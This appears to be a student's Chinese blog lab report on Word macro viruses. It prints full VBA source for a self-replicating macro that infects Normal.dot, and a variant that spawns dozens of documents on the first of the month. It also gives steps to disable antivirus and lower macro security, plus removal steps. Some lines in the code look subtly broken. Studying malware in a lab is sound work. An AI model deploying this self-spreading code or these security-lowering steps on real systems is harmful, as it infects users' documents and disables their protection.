恶意代码实验3:Word宏病毒实验

于 2023-11-21 16:15:03 发布
阅读量2k 收藏 32
点赞数 8
分类专栏: 恶意代码实验 文章标签: word linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63949327/article/details/134534064
版权

目录

实验环境:

实验内容:

实验步骤:

实验数据记录:

问题讨论:

实验环境:

Word 2003

实验内容:

1、自我复制,感染word公用模板和当前文档

'Micro-Virus
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
    Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With Host
    If .Lines(1.1) <> "'Micro-Virus" Then
        .DeleteLines 1, .CountOfLines
        .InsertLines 1, Ourcode
		.ReplaceLine 2, "Sub Document_Close()"
		If ThisDocument = nomaltemplate Then
			.ReplaceLine 2, "Sub Document_Open()"
            ActiveDocument.SaveAs ActiveDocument.FullName
        End If
    End If
End With
MsgBox "MicroVirus by Content Security Lab"
End Sub

只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。

2、具有一定破坏性的宏

完整代码如下:

'moonlight
Dim nm(4)
Sub Document_Open()
'DisableInput 1

Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule


Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
    Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'moonlight" Then
    
    .DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
    If ThisDocument = NormalTemplate Then
        .ReplaceLine 3, "Sub Document_Open()"
        ActiveDocument.SaveAs ActiveDocument.FullName
    End If
    
End If

End With

Count = 0
If Day(Now()) = 1 Then
try:
        On Error GoTo try
        test = -1
        con = 1
        tog$ = ""
        i = 0
        While test = -1
            For i = 0 To 4
                nm(i) = Int(Rnd() * 10)
                con = con * nm(i)
                If i = 4 Then
                    tog$ = tog$ + Str$(nm(4)) + "=?"
                    GoTo beg
                End If
                tog$ = tog$ + Str$(nm(i)) + "*"
            Next i
beg:
        Beep
        ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错,只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")
        If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
            Documents.Add
            Selection.Paragraphs.Alignment = wdAlignParagraphCenter
            Beep
            With Selection.Font
                .Name = "细明体"
                .Size = 16
                .Bold = 1
                .Underline = 1
            End With
            Selection.InsertAfter Text:="何谓宏病毒"
            Selection.InsertParagraphAfter
            Beep
            Selection.InsertAfter Text:="答案:"
            Selection.Font.Italic = 1
            Selection.InsertAfter Text:="我就是......"
            Selection.InsertParagraphAfter
            Selection.InsertParagraphAfter
            Selection.Font.Italic = 0
            Beep
            Selection.InsertAfter Text:="如何预防宏病毒"
            Selection.InsertParagraphAfter
            Beep
            Selection.InsertAfter Text:="答案:"
            Selection.Font.Italic = 1
            Selection.InsertAfter Text:="不要看我......"
            GoTo out
            Else
                Count = Count + 1
                For j = 1 To 20
                    Beep
                    Documents.Add
                Next j
            Selection.Paragraphs.Alignment = wdAlignParagraphCenter
            Selection.InsertAfter Text:="宏病毒"
            If Count = 2 Then GoTo out
            GoTo try
        End If
Wend
End If
out:
End Sub

实验步骤:

前提:降低安全性

1、关闭杀毒软件。建议直接进入“任务管理器”将正在后台运行的防护进程删除。

2、将word文档的宏安全性调制最低。在“安全级”选项框选“低”,在“可靠发行商”页面全选。在如下图:

3、点击确定,退出开始编写病毒

实验1、自我复制,感染word公用模板和当前文档

  1. 打开一个word文档,利用以下步骤:工具->宏->Visual Basic编辑器即可调用宏编写窗口。
  2. 在左侧小框中,选择project—>Microsoft Word对象->ThisDocument,在出现的页面中输入实验1的代码(上面第一个代码),保存。
  3. 退出宏编写器,又退出该word文档
  4. 重新进入该文档
  5. 观察病毒效果

实验2、具有一定破坏性的宏

  1. 打开一个word文档,利用以下步骤:工具->宏->Visual Basic编辑器即可调用宏编写窗口。
  2. 在左侧小框中,选择project—>Microsoft Word对象->ThisDocument,在出现的页面中输入实验1的代码(上面第一个代码),保存。
  3. 退出宏编写器,又退出该word文档
  4. 打开系统管理,更改系统时间为某个月的1号。因为该病毒设置为1号才运行。
  5. 观察病毒运行效果

实验3、清除宏病毒

  1. 打开受感染的某个文档,或者已经被打开的受感染文档。不管是不是第一个被植入病毒的文档。
  2. 利用以下步骤:工具->宏->Visual Basic编辑器,调用宏编写窗口。
  3. 左上角方框会显示许多文件,打开NormalMicrosoft Word对象This Document,清除其中的病毒代码(只要删除所有内容即可)。
  4. 然后打开ProjectàMicrosoft WordàThis Document,清除其中的病毒代码。
  5. 依此关闭打开的文档即可

实验数据记录:

实验1、自我复制,感染word公用模板和当前文档

1、打开的宏编辑器如图所示,即可编写病毒代码。

2、完成病毒代码的编写后,代码的执行效果如下:

3、分析:

实验2、具有一定破坏性的宏

1、运行结果如图:

回答正确的时候,病毒显示:

回答错误的时候,病毒显示:

且当你回答正确,便会一直让你答题,陷入死循环。回答不正确三次,即可自动跳出病毒程序,但那时已经出现几十个文档。若真中了宏病毒,容易造成运行缓慢、信道堵塞等问题

实验3、清除宏病毒

1、清除宏病毒主要要找到normal和project文件。

问题讨论:

1、再次从新进入word文档要从office方式进入才有效果,从wps打开没有意义。

whiskty
关注
  • 8
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
宏病毒实验讲解(含共享文件夹建立)
m0_57069925的博客
09-21 1020
vmware共享文件夹只是方便把文件在虚拟机和物理机直接传送要是不需要可以直接跳到第二部分看宏实验
Word宏病毒
热门推荐
qq_43717119的博客
06-22 1万+
Word宏病毒实验目的】 1、演示宏的编写。 2、说明宏的原理及其安全漏洞和缺陷。 3、理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 【实验环境】 在windows虚拟机中演示word宏病毒的发生机制,以及如何清除病毒的一系列操作宏病毒样本:自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt) 实验注意事项:为了保证该试验不至于造成较大破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 【实验预备知识点】 Wo
word文档宏病毒
m0_61368098的博客
09-10 1987
无限创建word文档来占用CPU资源,导致电脑宕机。注意在Normal下才是通用的,就是是个word文件在你的电脑上打开就会触发代码,在Project(新建 Microsoft Word 文档)下插入的代码只能用在这个word文档。
宏病毒实验
W_seventeen的博客
03-25 5565
简单的宏病毒 打开word文档,打开一个word 文档,然后按Alt+F11 调用宏编写窗口(或从工具->宏->Visual Basic->宏编辑器),定义宏名为一个自动宏。单击“创建”按钮,进入VB编辑状态,输入内容如下: Sub AutoOpen() ’ 'AutoOpen Macro Selection.TypeText Text:=“非常简单的宏病毒实例” End S...
宏病毒的实践
xiao_ZHEDA的博客
08-20 323
宏病毒实践
东华大学计算机病毒课实验宏病毒实验报告.doc
11-17
计算机病毒课实验宏病毒实验报告 本实验报告的主要内容是关于宏病毒实验报告,旨在通过两个简单的宏病毒示例,说明宏病毒的原理及其安全漏洞和缺陷,提高防范意识。实验中使用了Word 2003和Office word2007两个...
计算机宏病毒分析及清除实验.pdf
03-28
宏病毒是一种利用微软Office软件中的宏功能进行自我复制和传播的恶意代码。宏是预定义的一系列命令,可以自动化执行特定任务。当用户打开含有宏病毒的文档时,病毒会自动执行,通常在后台完成复制和感染其他文档的...
宏病毒实验报告
05-07
### 宏病毒实验报告知识点详解 #### 一、宏与宏病毒的概念 宏是一种由一系列命令组成的程序,这些命令在Microsoft Word等办公软件中可以自动执行特定任务,从而简化重复性的操作,提升工作效率。然而,宏病毒正是...
东华大学计算机病毒课实验宏病毒实验报告.pdf
最新发布
10-21
我们可以对上例中的恶意代码稍加修改,使其具有破坏性(这里以著名宏病毒“台湾一号”的恶意代码部分为基础,为使其在Word 2003版本中运行,且降低破坏性,对源代码作适当修改)。该病毒的效果如下:当打开被感染的...
VB 宏 病 毒 实 验
03-15
Word宏是指能组织到一起为独立命令使用的一系列Word指令;自我复制,感染word公用模板和当前文档
word软件是不是计算机病毒,《计算机病毒》Word宏病毒实验
weixin_29331689的博客
07-13 679
《计算机病毒与防护技术》课程必做实验实验报告,内涵完整程序代码。实验报告题目: Word 宏病毒实验 姓名 范春鹏 学号 09283030 实验环境: 操作系统:windows 系统 XP( ) 2003() 其他: 软件:Visual Studio 6.0 硬件环境:CPU 主频( 3.00GHz ) 内存(0.99GB ) 实验内容: 1、观察宏病毒自我复制、感染 word 公用模板和当前文...
Kali渗透测试:使用Word宏病毒进行渗透攻击
Liu_Bruce的博客
05-14 4460
Kali渗透测试:使用宏病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、WordVBA小程序不计其数。宏病毒Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。 构造一个包含宏病毒Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或
新型BlackEnergy(word宏)病毒分析
weixin_32223733的博客
04-22 2540
新型BlackEnergy(word宏)病毒分析前言BlackEnergy木马介绍BlackEnergy木马分析BlackEnergy木马攻击还原攻击场景搭建木马行为分析总结 目录 0X01 前言 1 0X02 BLACKENGERGY木马介绍 4 BlackEnergy 1 5 BlackEnergy 2 5 BlackEnergy 3 5 0X03 BLACKENGERGY木马分析 4 攻击流...
台湾一号宏病毒原始源代码
家有恶妻 请勿靠近
08-01 7684
Taiwan No.1 病毒原始码  Dim Shared nm(4)  Sub MAIN  DisableInput 1  If Day(Now()) = 13 Then  try:    On Error Goto 0    On Error Goto try    test = - 1    con = 1    tog$ = ""    i =
Word 宏病毒防治--宏病毒(转)
csd3176的博客
08-13 1106
Word 宏病毒防治--宏病毒(转)[@more@]   宏是Word 里一个非常有用的工具,但也是Word 的安全漏洞之一。有一些恶意的人利用宏制造宏病毒,给别人带来麻烦。宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦...
EXCEL startup.exe 宏病毒
weixin_34411563的博客
11-13 204
StartUp.xls宏病毒清除方法 第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls; 第二步:清除C:\Documents and Settings\administrator\Application Data\Micr...
服务器word文件病毒,极具欺骗性的勒索病毒出现!打开Office文档立刻中招
weixin_40008884的博客
08-03 1736
WannaCry、Petya、Cerber、Locky、Spora……勒索病毒如今已经泛滥成灾,下半年几乎每天都有新的变种出现,攻击手法也无所不用其极。中了这种病毒后,用户的电脑文件就会被高强度加密,能恢复的极为罕见,损失惨重。本周末,金山毒霸安全实验室再次截获最新的勒索病毒,这次是利用Office DDE(微软动态数据交换)里边的一个漏洞,极具伪装性、欺骗性。用户一旦点错对话框,会立刻导致电脑文...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值